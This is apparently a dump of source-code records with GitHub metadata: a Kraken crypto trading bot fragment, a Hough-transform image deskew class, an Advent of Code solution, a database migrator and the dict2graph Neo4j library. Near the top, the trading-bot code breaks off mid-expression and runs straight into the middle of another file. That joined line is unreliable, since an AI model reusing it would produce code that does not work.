logger.info(\"fail to send Special notification for benefit. error was \"+str(e))\n break;\n\n # Finally setup open order to freshest list\n list_open_orders=fresh_open_orders\n time.sleep(15)\n\n \n if(DO_STEP2==True):\n \n # Safety check (only if owned_value > 0 (if =-1 it means that it change during time when we get open orders))\n if(owned_volume>0.0):\n safetyCheckOnTradingCurrencySellingOrder(list_open_orders,owned_volume)\n else:\n logger.info(\"Safety check is not going to be performed ( owned_volume=\"+str(owned_volume)+\")\")\n \n ##########################\n # Traders\n ##########################\n CAN_LAUNCH_BUYING_ORDER=False\n CURRENT_BUYING_ORDER_ID=-1\n # Check if a trader is buying, else set up to buy\n EXISTS_OPEN_BUYING_ORDERS=False\n BUYING_TRADER_ID=-1\n for index in range(0,NB_OF_TRADERS):\n if list_trader[index][4]==BUYING:\n EXISTS_OPEN_BUYING_ORDERS=True\n BUYING_TRADER_ID=list_trader[index][0]\n CURRENT_BUYING_ORDER_ID=list_trader[index][3]\n \n # Get trading informations only if no other speculators are buying\n IS_TREND_GROWING=False\n if(EXISTS_OPEN_BUYING_ORDERS==False):\n df2=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,2)\n df5=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,5)\n df10=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,10)\n # I take 16 mins to be sure having at least 14.5 mins\n df15=persistenceHandler.get_Trends_time_series(kraken_time,CURRENCY_CRAWLED_NAME,16)\n \n trends2_is_growing=businessLogic.it_market_increasing(df2)\n trends5_is_growing=businessLogic.it_market_increasing(df5)\n trends10_is_growing=businessLogic.it_market_increasing(df10)\n trends15_is_growing=businessLogic.it_market_increasing(df15)\n \n delay_covered=(max(df15.index) - min(df15.index)).seconds\n logger.info('Covered delay = '+str(round( (delay_covered/60) ,2))+' mins / Trend data: (T2:'+str(len(df2))+' elems),(T5:'+str(len(df5))+' elems),(T10:'+str(len(df10))+' elems),(T15='+str(len(df15))+' elems)')\n \n # Checking if trend is reliable\n if(len(df2)>2 and len(df5)>5 and len(df10)>10 and len(df15)>15 and (delay_covered/60.0)>=14.5):\n if(trends2_is_growing and trends5_is_growing and trends10_is_growing and trends15_is_growing):\n # Checking that trends number is enough:\n logger.info(\"Market is good right now \")\n IS_TREND_GROWING=True\n else:\n logger.info(\"Market is not good at this time \")\n else:\n logger.warn(\"Number of data for trends is not reliable\")\n \n # If market is growing and no one is buying, check bugdet\n if(IS_TREND_GROWING==True and EXISTS_OPEN_BUYING_ORDERS==False):\n logger.info(\"Market is OK, and no buying orders open : time to shop a little bit ! \")\n # calculate budget, get the right trader and launch buying\n list_trader=budgetCalculation(list_trader,NB_OF_TRADERS,logs=True)\n \n #Check if the speculator has right to buy:\n if AUTHORIZATION_OF_BUYING==True and currency_actual_ask_price>=MIN_BUYING_PRICE:\n logger.info(\"Remember : Speculator is allowed to trade\")\n # /!\\ check from lowest trader to higher trader is essential\n SELECTED_TRADER_ID_FOR_BUYING=-1\n for index in range(NB_OF_TRADERS-1,-1,-1):\n # If trader's buy price is higher than value price we have the right trader\n if(list_trader[index][2]>=currency_actual_ask_price):\n # index of selected trader is index+1 (lower )\n ###################\n # SET BUYING ORDER\n ##################\n SELECTED_TRADER_ID_FOR_BUYING=index+1\n # Checking it trader is available:\n if(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]==WAITING):\n # Calculate volume to buy\n volume_to_buy=businessLogic.get_maximum_volume_to_buy_with_budget( round( list_trader[SELECTED_TRADER_ID_FOR_BUYING][5],2),list_trader[SELECTED_TRADER_ID_FOR_BUYING][2] )\n logger.info(\"Trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+' was selected to buy at '+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][2])+\" because market price is \"+str(currency_actual_ask_price))\n logger.info(\" budget is going to be \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][5])+\"€\")\n logger.info(\" buying volume :\"+str(volume_to_buy))\n logger.info(\" For further analysis, unix time is \"+str(kraken_time))\n \n # create buying order\n created_buying_order=kraken.secure_buy(volume_to_buy,list_trader[SELECTED_TRADER_ID_FOR_BUYING][2],CURRENCY_CRAWLED_NAME,persistenceHandler,STEP_BETWEEN_UNIT_SELL_AND_UNIT_PRICE,CURRENCY_ORDER_NAME)\n logger.info(\"Buying order \"+created_buying_order.get('order_id')+\" was created\")\n list_open_orders.append(created_buying_order)\n # /!\\set up right status and cut budget setup selling order \n list_trader[SELECTED_TRADER_ID_FOR_BUYING][3]=created_buying_order.get('order_id')\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][4]=BUYING\n list_trader[SELECTED_TRADER_ID_FOR_BUYING][5]=0.0\n # setup buying mode to avoir other buy attempt\n EXISTS_OPEN_BUYING_ORDERS=True\n else:\n logger.info(\"Speculator wanted with trader \"+str(SELECTED_TRADER_ID_FOR_BUYING)+\" is already in \"+str(list_trader[SELECTED_TRADER_ID_FOR_BUYING][4])+\" mode\")\n break;\n else:\n logger.info(\"Speculator is actually in mode AUTHORIZATION_OF_BUYING==False\")\n else:\n if(EXISTS_OPEN_BUYING_ORDERS==True):\n # On ne verifie pas l'ordre du top trader (on ne peut rien faire de toute manière)\n if(BUYING_TRADER_ID>0):\n logger.info(\"Check if Trader \"+str(BUYING_TRADER_ID)+\" buying order has still potential to reach \")\n # check if order is ok\n buying_trader=list_trader[BUYING_TRADER_ID]\n upper_buying_trader=list_trader[BUYING_TRADER_ID-1]\n if(buying_trader[0]==BUYING_TRADER_ID and upper_buying_trader[0]==BUYING_TRADER_ID-1):\n # Control is : market price has to be - upper or equals to buyer unit price\n if(buying_trader[2]<= currency_actual_ask_price and currency_actual_ask_price max_variance:\n max_variance = variance\n target_shift = shift\n\n if shift % 300 == 0 and shift != -MAX_SHIFT:\n plt.clf()\n plt.plot(np.arange(-MAX_SHIFT, shift + 1), variances)\n plt.savefig('out/variances.png')\n\n print(f\"Finished calculating, optimal shift is {target_shift}\")\n sys.setrecursionlimit(old_recursion_limit)\n\n return img_tools.rotate_by_shift(\n self.source, target_shift, \n img_tools.InterpolationType.BILINEAR\n )\n\n def _get_brightness_variance(self, shift):\n line_brightness = []\n N, M = self._img.shape \n for x in range(min(-shift, 0), max(N - shift, N) + 1):\n stats = self._brightness_statistics(x, 0, shift, M)\n if stats[1] != 0:\n line_brightness.append(stats[0] / stats[1])\n return np.var(line_brightness) if line_brightness else 0\n\n @lru_cache(10**8)\n def _brightness_statistics(self, x, y, shift_x, shift_y):\n \"\"\"\n returns (brightness sum, amount of featured cells)\n of cells from to not inclusive\n \"\"\"\n\n sign = lambda x: 1 if x >= 0 else -1\n if not img_tools.contains_coordinates(self._img, x, y) and \\\n not img_tools.contains_coordinates(self._img, x + shift_x - sign(shift_x), y + shift_y - 1):\n return np.array([0, 0]) \n \n if abs(shift_x) <= 1:\n res = np.zeros(2)\n for y_i in range(y, y + shift_y):\n if img_tools.contains_coordinates(self._img, x, y_i):\n res += np.array([self._img[x][y_i], 1])\n return res\n\n shift_x2 = sign(shift_x) * (abs(shift_x) // 2)\n shift_y2 = shift_y // 2\n return self._brightness_statistics(x, y, shift_x2, shift_y2) +\\\n self._brightness_statistics(x + shift_x2, y + shift_y2, shift_x - shift_x2, shift_y - shift_y2)","repo_name":"Moysenko/ABBYY_CV","sub_path":"Homework_3/fht.py","file_name":"fht.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74927007452","text":"def score_round(text: str) -> int:\n legend = {\n \"A\": \"Rock\",\n \"B\": \"Paper\",\n \"C\": \"Scissors\",\n \"X\": \"Rock\",\n \"Y\": \"Paper\",\n \"Z\": \"Scissors\",\n }\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp, conv_me = legend[opp], legend[me]\n score = choices[conv_me]\n if wins[conv_opp] == conv_me:\n pass\n elif conv_opp == conv_me:\n score += 3\n elif wins[conv_me] == conv_opp:\n score += 6\n return score\n\n\ndef score_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round(cur_round)\n return score\n\n\ndef part_1():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_game(data) == 15\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_game(data))\n\n\ndef score_round_part2(text: str) -> int:\n legend = {\"A\": \"Rock\", \"B\": \"Paper\", \"C\": \"Scissors\"}\n wins = {\"Rock\": \"Scissors\", \"Paper\": \"Rock\", \"Scissors\": \"Paper\"}\n losses = {v: k for k, v in wins.items()}\n choices = {\"Rock\": 1, \"Paper\": 2, \"Scissors\": 3}\n opp, me = text.split(\" \")\n conv_opp = legend[opp]\n score = 0\n if me == \"X\":\n score += choices[wins[conv_opp]]\n elif me == \"Y\":\n score += choices[conv_opp] + 3\n elif me == \"Z\":\n score += choices[losses[conv_opp]] + 6\n return score\n\n\ndef score_second_game(text: str) -> int:\n score = 0\n for cur_round in text.split(\"\\n\"):\n score += score_round_part2(cur_round)\n return score\n\n\ndef part_2():\n # tests\n with open(\"2_test.txt\", \"r\") as f:\n data = f.read()\n assert score_second_game(data) == 12\n\n # input\n with open(\"2_input.txt\", \"r\") as f:\n data = f.read()\n print(score_second_game(data))\n\n\npart_1()\npart_2()\n","repo_name":"grahampicard/advent-of-code-2022","sub_path":"2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41812236353","text":"import importlib\n\n\nclass Migrator:\n\tVERSION = None\n\n\tdef __init__(self, db):\n\t\t\"\"\"\n\t\tInitiate migrator class.\n\n\t\t:param db: Database instance\n\t\t:type db: layblr.database.db.Database\n\t\t\"\"\"\n\t\tself.db = db\n\t\tself.connection = db.connection\n\n\tasync def up(self):\n\t\t\"\"\"\n\t\tMigrate the schema to the new version.\n\t\t\"\"\"\n\t\traise NotImplementedError\n\n\tasync def down(self):\n\t\t\"\"\"\n\t\tMigrate down to the older version (undo changes). Optional but recommended.\n\t\t:return:\n\t\t\"\"\"\n\t\traise Exception('No down migration')\n\n\ndef get_migration_versions():\n\t\"\"\"\n\tScan folder for migration versions and return the version classes.\n\n\t:return: Version migrator classses.\n\t\"\"\"\n\tfrom layblr.database.migration import versions\n\treturn versions\n\n\ndef get_latest_version():\n\t\"\"\"\n\tGet latest version.\n\n\t:return: Latest version number\n\t\"\"\"\n\tversions = get_migration_versions()\n\treturn int(versions[len(versions) - 1])\n\n\ndef get_version_class(version):\n\t\"\"\"\n\tImport and return class of the given integer version.\n\t:param version: Version integer.\n\t:return: Class of the migration version.\n\t\"\"\"\n\tversion_string = '{0:03d}'.format(version)\n\tmodule_name = 'v{}'.format(version_string)\n\tversion_class = 'Version{}'.format(version_string)\n\n\tmodule = importlib.import_module('layblr.database.migration.{}'.format(module_name))\n\treturn getattr(module, version_class)\n","repo_name":"layblr/layblr","sub_path":"layblr/database/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"41597447839","text":"import json\nfrom typing import Union\nfrom typing import List, Dict, Tuple, Type\nfrom py2neo import Graph\nfrom neo4j import Driver\n\nfrom graphio import NodeSet, RelationshipSet\nfrom dict2graph.node import Node\nfrom dict2graph.relation import Relation\nfrom dict2graph.transformers._base import (\n _NodeTransformerBase,\n _RelationTransformerBase,\n)\nfrom dict2graph.transformers import Transformer\nfrom dict2graph.matcher_transformators_container import (\n MatcherTransformersContainer,\n MatcherTransformersContainerStack,\n)\n\n\nclass Dict2graph:\n \"\"\"\n The central class for dict2graph. Must be instanced to do get started and access the dict2graph api.\n\n **Class attributes**\n Dict2Graph has some basic options, packed into class attributes. You can change them after instantiating Dict2Graph.\n Usally you can go with the default values and dont need to change anything here.\n\n **example**\n\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2graph()\n d2g.list_hub_additional_labels = [\"Collection\"]\n ```\n This will (later when parsing/transforming) add a label `Collection` to all list hubs\n\n\n Attributes:\n list_hub_additional_labels: Add these labels to list hub nodes. Defaults to `[\"ListHub\"]`.\n\n list_item_additional_labels: Add these labels to list item nodes. Defaults to `[\"ListItem\"]`.\n\n list_hub_id_property_name: A hub node has hash generated property based on its items.\n This is the name/key of the property. Defaults to `id`.\n\n list_item_relation_index_property_name: To preserve a json/dict list sequence,\n the index will be added to the relation from a list item node.\n This is the name/key of this property. Defaults to `_list_item_index`.\n\n simple_list_item_data_property_name: A list of basic types like `[1,2,3]` will get the label from its parents,\n but needs a default name/key for the value properties. Defaults to `_list_item_data`.\n\n root_node_default_labels: Will be used as root node label, if no root node label can be captured\n and no articial root node labels (via `Dict2Graph.parse(root_node_labels)`) are provided. Defaults to `[\"Dict2GraphRoot\"]`.\n\n root_node_default_id_property_name: The root node will have a primary key based on a hash of the dict input. This is the name/key fir this property.\n\n empty_node_default_id_property_name: To prevent all empty nodes to merging together when doing\n `Dict2Graph.merge()`, they get an hash id by default.\n This is name/key for this property. Defaults to `id`.\n \"\"\"\n\n # Replacement strings {ITEM_PRIMARY_LABEL} and {ITEM_LABELs} are available\n list_hub_additional_labels: List[str] = [\"ListHub\"]\n list_item_additional_labels: List[str] = [\"ListItem\"]\n list_hub_id_property_name: str = \"id\"\n list_item_relation_index_property_name: str = \"_list_item_index\"\n\n simple_list_item_data_property_name: str = \"_list_item_data\"\n root_node_default_labels: List[str] = [\"Dict2GraphRoot\"]\n root_node_default_id_property_name: str = \"id\"\n\n empty_node_default_id_property_name: str = \"id\"\n\n def __init__(\n self,\n create_ids_for_empty_nodes: bool = True,\n interpret_single_props_as_labels: bool = True,\n ):\n \"\"\"\n Usage:\n ```python\n from dict2graph import Dict2graph\n\n d2g = Dict2Graph()\n ```\n\n Args:\n create_ids_for_empty_nodes (bool, optional): When input dicts results in empty 'hub' nodes, this will create artificially key properties based on the child data. The key will be deterministic . Defaults to True.\n interpret_single_props_as_labels (bool, optional): When having objects with a single property like `{\"animal\":{\"name\":\"dog\"}}` `animal` will be interpreted as label. If set to false \"animal\" will result in an extra Node. Defaults to True.\n \"\"\"\n self.create_ids_for_empty_nodes = create_ids_for_empty_nodes\n\n # Todo: \"interpret_single_props_as_labels\" should be a regualr NodeTransformer instead of a class param\n self.interpret_single_props_as_labels = interpret_single_props_as_labels\n\n self._node_cache: List[Node] = []\n self._node_cache_feeder: List[Node] = []\n\n self._rel_cache: List[Relation] = []\n self._rel_cache_feeder: List[Node] = []\n self._nodeSets: Dict[Tuple, NodeSet] = {}\n self._relSets: Dict[Tuple, RelationshipSet] = {}\n self.matcher_and_node_transformers_stack = MatcherTransformersContainerStack([])\n self.matcher_and_rel_transformers_stack = MatcherTransformersContainerStack([])\n\n def add_transformation(\n self,\n transformer: Union[\n _NodeTransformerBase,\n _RelationTransformerBase,\n List[Union[_NodeTransformerBase, _RelationTransformerBase]],\n ],\n ):\n \"\"\"Add one or a list of [`Transformers`](/use_transformers.md) to the Dict2Graph instance.\n Transformers can re-model your graph befor writing it to a Neo4j database.\n\n **usage**:\n ```python\n from dict2graph import Dict2graph, Transformer, NodeTrans\n\n d2g = Dict2Graph()\n d2g.add_transformation(\n Transformer.match_nodes(\"article\").do(NodeTrans.OverrideLabel(\"book\"))\n )\n ```\n\n Args:\n transformer (Union[ _NodeTransformerBase, _RelationTransformerBase, List[Union[_NodeTransformerBase, _RelationTransformerBase]], ]): A list or single instance of a Transformer\n\n \"\"\"\n\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_transformation(trans)\n return\n if self._get_transformer_class(transformer) == _NodeTransformerBase:\n self.add_node_transformation(transformer)\n\n elif self._get_transformer_class(transformer) == _RelationTransformerBase:\n self.add_relation_transformation(transformer)\n else:\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}' or '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}')\"\n )\n\n def _get_transformer_class(\n self, transformer: Union[_NodeTransformerBase, _RelationTransformerBase]\n ) -> Union[Type[_NodeTransformerBase], type[_RelationTransformerBase]]:\n if issubclass(transformer.__class__, _NodeTransformerBase) and issubclass(\n transformer.__class__, _RelationTransformerBase\n ):\n # We got a generic transformer. we have to look at the matcher to determine the transformer type.\n if isinstance(transformer.matcher, Transformer.RelTransformerMatcher):\n return _RelationTransformerBase\n elif isinstance(transformer.matcher, Transformer.NodeTransformerMatcher):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _NodeTransformerBase):\n return _NodeTransformerBase\n elif issubclass(transformer.__class__, _RelationTransformerBase):\n return _RelationTransformerBase\n\n def add_node_transformation(\n self, transformer: Union[_NodeTransformerBase, List[_NodeTransformerBase]]\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_node_transformation(trans)\n return\n if transformer.matcher is None:\n raise ValueError(f\"No matcher added to {transformer}\")\n if not issubclass(transformer.__class__, _NodeTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_NodeTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_relation_transformation()` instead of `add_node_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.NodeTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.NodeTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a relationship matcher instead of a node matcher (`match_nodes()` vs. `match_rels()`) while using `Dict2graph.add_node_transformation()`?\"\n )\n else:\n transformer.d2g = self\n self.matcher_and_node_transformers_stack.add_container(transformer)\n\n def add_relation_transformation(\n self,\n transformer: Union[_RelationTransformerBase, List[_RelationTransformerBase]],\n ):\n if isinstance(transformer, list):\n for trans in transformer:\n self.add_relation_transformation(trans)\n return\n elif not issubclass(transformer.__class__, _RelationTransformerBase):\n raise ValueError(\n f\"Expected transformer of subclass '{_RelationTransformerBase}', got '{transformer.__class__}' (child of '{transformer.__class__.__bases__}').\\nMaybe you wanted to use function `Dict2graph.add_node_transformation()` instead of `add_relation_transformation`?\"\n )\n elif transformer.matcher.__class__ != Transformer.RelTransformerMatcher:\n raise ValueError(\n f\"Expected transformer matcher of class '{Transformer.RelTransformerMatcher}', got '{transformer.matcher.__class__}'.\\nMaybe you accidentally added a node matcher instead of a relationship matcher (`match_rels()` vs. `match_nodes()`) while using `Dict2graph.add_relation_transformation()`?\"\n )\n else:\n self.matcher_and_rel_transformers_stack.add_container(transformer)\n\n def parse(\n self, data: Dict, root_node_labels: Union[str, List[str]] = None\n ) -> \"Dict2graph\":\n \"\"\"Submit your actual data (as dict) to dict2graph. The data will be transformed instantly but not yet pushed to your Neo4j database.\n It will land in a dict2graph internal cache. You can run multiple `Dict2Graph.parse()` passes before pushing the data to your Neo4j database.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"myDictKey\":\"myValue\"}\n d2g = Dict2Graph()\n d2g.parse(data)\n ```\n Args:\n data (Dict): Your data as a dict with only basic typed valued, as a rule of thumb it should be json compatible.\n If you have json string you may use the build-in python module \"json\" in before(`json.loads(your_data_as_json)`)\n root_node_labels (Union[str, List[str]], optional): Dict2graph tries to determine a sensible root node.\n But that is not possible in many cases and dict2graph\n will return to the default label in `Dict2graph.root_node_default_labels`.\n with `Dict2graph.parse(root_node_labels)` you can force a root label.\n Defaults to None.\n\n Raises:\n ValueError: When data is not parsable.\n\n Returns:\n Dict2graph: Returns itself to be able to chains commands like `dict2graph_ints.parse(data).parse(data2).create(NEO4J_DRIVER)`\n \"\"\"\n if root_node_labels is None:\n if isinstance(data, dict) and len(data.keys()) == 1:\n # we only have one key and therefore only one Node on the top-/root-level. We dont need a root Node to connect the toplevels nodes.\n root_node_labels = [list(data.keys())[0]]\n data = data[root_node_labels[0]]\n else:\n root_node_labels = self.root_node_default_labels\n if isinstance(root_node_labels, str):\n root_node_labels = [root_node_labels]\n\n if isinstance(data, str):\n data_obj = json.loads(data)\n else:\n data_obj = data\n if not isinstance(data_obj, dict) and not isinstance(data_obj, list):\n raise ValueError(\n \"Expected json compatible object like a dict or list. got {}\".format(\n type(data_obj).__name__\n )\n )\n if isinstance(data_obj, dict):\n\n root_node = self._parse_traverse_dict_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n\n elif isinstance(data_obj, list):\n root_node = self._parse_traverse_list_fragment(\n labels=root_node_labels, data=data_obj, parent_node=None\n )\n self._prepare_root_node(root_node)\n\n self._flush_cache()\n return self\n\n def merge(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n create_merge_indexes: bool = True,\n ):\n \"\"\"Push the data to a Neo4h database, with a merge operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.merge(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in one node `(:car{wheels:4})` because the two datasets where merged (based on same labels and properties).\n\n Args:\n graph (Union[Graph, Driver]): A [`neo4j.GraphDatabase` instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n create_merge_indexes (bool, optional): _description_. Defaults to True.\n \"\"\"\n\n if create_merge_indexes:\n self.create_indexes_for_merge_keys(graph)\n for nodes in self._nodeSets.values():\n nodes.merge(graph, database=database)\n for rels in self._relSets.values():\n rels.merge(graph, database=database)\n\n def create(\n self,\n graph: Union[Graph, Driver],\n database: str = None,\n ):\n \"\"\"Push the data to a Neo4h database, with a create operation.\n\n **usage**\n ```python\n from dict2graph import Dict2graph\n from neo4j import GraphDatabase\n # provide any dict that is json compatible (basic typed values and keys)\n data = {\"car\":{\"wheels\":\"4\"}}\n data2 = {\"car\":{\"wheels\":\"4\"}}\n d2g = Dict2Graph()\n d2g.parse(data)\n d2g.parse(dat2)\n d2g.create(GraphDatabase.driver(\"neo4j://localhost\"))\n ```\n\n Will result in two nodes `(:car{wheels:4})`.\n\n Args:\n graph (Union[Graph, Driver]): A [Neo4j python driver instance](https://neo4j.com/docs/api/python-driver/current/)\n or a [`py2neo.Graph` instance](https://py2neo.org/2021.1/workflow.html#graph-objects)\n database (str, optional): Name of the Neo4j [database](https://neo4j.com/docs/cypher-manual/current/databases/). Defaults to None which will eb the default \"neo4j\" db.\n \"\"\"\n for nodes in self._nodeSets.values():\n nodes.create(graph, database=database)\n for rels in self._relSets.values():\n rels.create(graph, database=database)\n\n def create_indexes_for_merge_keys(self, graph: Union[Graph, Driver]):\n for nodes in self._nodeSets.values():\n\n nodes.create_index(graph)\n\n def _prepare_root_node(self, node: Node):\n node.is_root_node = True\n if len(node.keys()) == 0:\n node[self.root_node_default_id_property_name] = node.get_hash(\n include_children_data=True\n )\n\n node.merge_property_keys = [self.root_node_default_id_property_name]\n\n def _parse_traverse_dict_fragment(\n self, data: Dict, parent_node: Node, labels: List[str] = None\n ) -> Node:\n new_node = Node(labels=labels, source_data=data, parent_node=parent_node)\n new_child_nodes: List[Node] = []\n new_rels: List[Relation] = []\n for key, val in data.items():\n if self._is_basic_attribute_type(val):\n # value is a simple type. attach as property to node\n new_node[key] = val\n else:\n # value is dict or list in itself and therefore one or multiple child nodes\n r = None\n n = None\n if isinstance(val, dict):\n if self._is_named_obj(val):\n n = self._parse_traverse_dict_fragment(\n labels=list(val.keys()),\n data=val[list(val.keys())[0]],\n parent_node=new_node,\n )\n r = Relation(start_node=new_node, end_node=n, relation_type=key)\n else:\n n = self._parse_traverse_dict_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif isinstance(val, list):\n n = self._parse_traverse_list_fragment(\n labels=[key], data=val, parent_node=new_node\n )\n elif val is not None:\n raise ValueError(\n f\"Expected dict val to be a None, basic type, a list or a dict. Got `{type(val)}` for key '{key}' value '{val}'\"\n )\n if n is not None:\n new_child_nodes.append(n)\n if r is None:\n r = Relation(\n start_node=new_node,\n end_node=n,\n )\n new_rels.append(r)\n self._node_cache.append(new_node)\n self._rel_cache.extend(new_rels)\n return new_node\n\n def _parse_traverse_list_fragment(\n self, labels: List[str], parent_node: Node, data: Dict\n ) -> Node:\n\n # create/set list root node. this is the node on which the list items will attach to\n # the parent_node is the default root\n\n list_root_hub_node: Node = Node(\n labels=labels,\n source_data=data,\n parent_node=parent_node,\n )\n self._set_list_root_hub_node_labels(list_root_hub_node)\n list_root_hub_node.is_list_list_hub = True\n self._node_cache.append(list_root_hub_node)\n # parse nodes\n new_list_item_nodes: List[Node] = []\n for index, obj in enumerate(data):\n if self._is_basic_attribute_type(obj):\n n = Node(labels, source_data=obj, parent_node=list_root_hub_node)\n\n n[self.simple_list_item_data_property_name] = obj\n self._node_cache.append(n)\n new_list_item_nodes.append(n)\n elif self._is_named_obj(obj):\n obj_label = list(obj.keys())[0]\n obj_data = obj[obj_label]\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=obj_label, data=obj_data, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, dict):\n new_list_item_nodes.append(\n self._parse_traverse_dict_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n elif isinstance(obj, list):\n new_list_item_nodes.append(\n self._parse_traverse_list_fragment(\n labels=labels, data=obj, parent_node=list_root_hub_node\n )\n )\n\n # create relations to list root node\n child_ids: List[str] = []\n\n for index, node in enumerate(new_list_item_nodes):\n if node is None:\n continue\n self._set_list_item_node_labels(node)\n node.is_list_list_item = True\n child_ids.append(node.id)\n r = Relation(\n start_node=list_root_hub_node,\n end_node=node,\n )\n\n r[self.list_item_relation_index_property_name] = index\n node.parent_node = list_root_hub_node\n self._rel_cache.append(r)\n #\n\n list_root_hub_node[\n self.list_hub_id_property_name\n ] = list_root_hub_node.get_hash(include_children_data=True)\n list_root_hub_node.merge_property_keys = [self.list_hub_id_property_name]\n\n return list_root_hub_node\n\n def _is_empty(self, val):\n if not val:\n return True\n if isinstance(val, str) and val.upper() in [\"\", \"NULL\"]:\n return True\n return False\n\n def _is_basic_attribute_type(self, val):\n if isinstance(val, (str, int, float, bool)):\n return True\n else:\n return False\n\n def _is_named_obj(self, data: Dict):\n \"\"\"If an object is a one-keyd dict on the first layer and there is a dict behind this key,\n we determine that this one key is the label/type and the inner dict are the props\n\n Args:\n data (List): _description_\n\n Returns:\n _type_: _description_\n \"\"\"\n # {\"person\":{\"name\":\"tom\",\"lastname\":\"schilling\"}} -> we know its a person\n # {\"name\":\"tom\",\"lastname\":\"schilling\"} -> Could be a person or a lama\n # {\"client\":{\"name\":\"tom\",\"lastname\":\"schilling\"},\"cert\":\"yes\"} -> -> Could be a person or a computer\n if not self.interpret_single_props_as_labels:\n return False\n if (\n isinstance(data, dict)\n and len(data.keys()) == 1\n and isinstance(data[list(data.keys())[0]], dict)\n ):\n return True\n return False\n\n def _set_list_root_hub_node_labels(self, node: Node) -> str:\n addi_labels = [\n l.replace(\"{{ITEM_PRIMARY_LABEL}}\", node.primary_label)\n for l in self.list_hub_additional_labels\n ]\n addi_labels = [\n l.replace(\"{{ITEM_LABELS}}\", \"_\".join(node.primary_label))\n for l in addi_labels\n ]\n\n node.labels = node.labels + addi_labels\n\n def _set_list_item_node_labels(self, node: Node) -> str:\n node.labels = node.labels + self.list_item_additional_labels\n\n def _manifest_node_from_cache(self, cached_node: Node):\n node_set: NodeSet = self._get_or_create_nodeSet(cached_node)\n if self.create_ids_for_empty_nodes and cached_node.id is None:\n cached_node[\n self.empty_node_default_id_property_name\n ] = cached_node.get_hash(include_children_data=True)\n cached_node.merge_property_keys = [self.empty_node_default_id_property_name]\n node_set.add_node(cached_node)\n\n def _get_or_create_nodeSet(self, node: Node) -> NodeSet:\n node_type_fingerprint = (\n frozenset(node.labels),\n frozenset(node.merge_property_keys),\n )\n if node_type_fingerprint not in self._nodeSets:\n self._nodeSets[node_type_fingerprint] = NodeSet(\n labels=node.labels,\n merge_keys=node.merge_property_keys\n if node.merge_property_keys\n else list(node.keys()),\n )\n return self._nodeSets[node_type_fingerprint]\n\n def _manifest_rel_from_cache(self, cached_relation: Relation):\n rel_set: RelationshipSet = self._get_or_create_relSet(cached_relation)\n rel_set.add_relationship(\n start_node_properties=cached_relation.start_node,\n end_node_properties=cached_relation.end_node,\n properties=cached_relation,\n )\n\n def _get_or_create_relSet(self, relation: Relation) -> RelationshipSet:\n rel_id = (\n frozenset(relation.start_node.labels),\n frozenset(relation.start_node.merge_property_keys),\n relation.relation_type,\n frozenset(relation.end_node.labels),\n frozenset(relation.end_node.merge_property_keys),\n )\n\n if rel_id not in self._relSets:\n self._relSets[rel_id] = RelationshipSet(\n rel_type=relation.relation_type,\n start_node_labels=relation.start_node.labels,\n end_node_labels=relation.end_node.labels,\n start_node_properties=relation.start_node.merge_property_keys,\n end_node_properties=relation.end_node.merge_property_keys,\n )\n return self._relSets[rel_id]\n\n def add_node_to_cache(self, node: Node):\n \"\"\"Add a new [dict2graph.Node][] to the dict2graph cache.\n This method is only relevant for [`Transformers`](/use_transformers).\n\n You will propably only need it of you create [custom 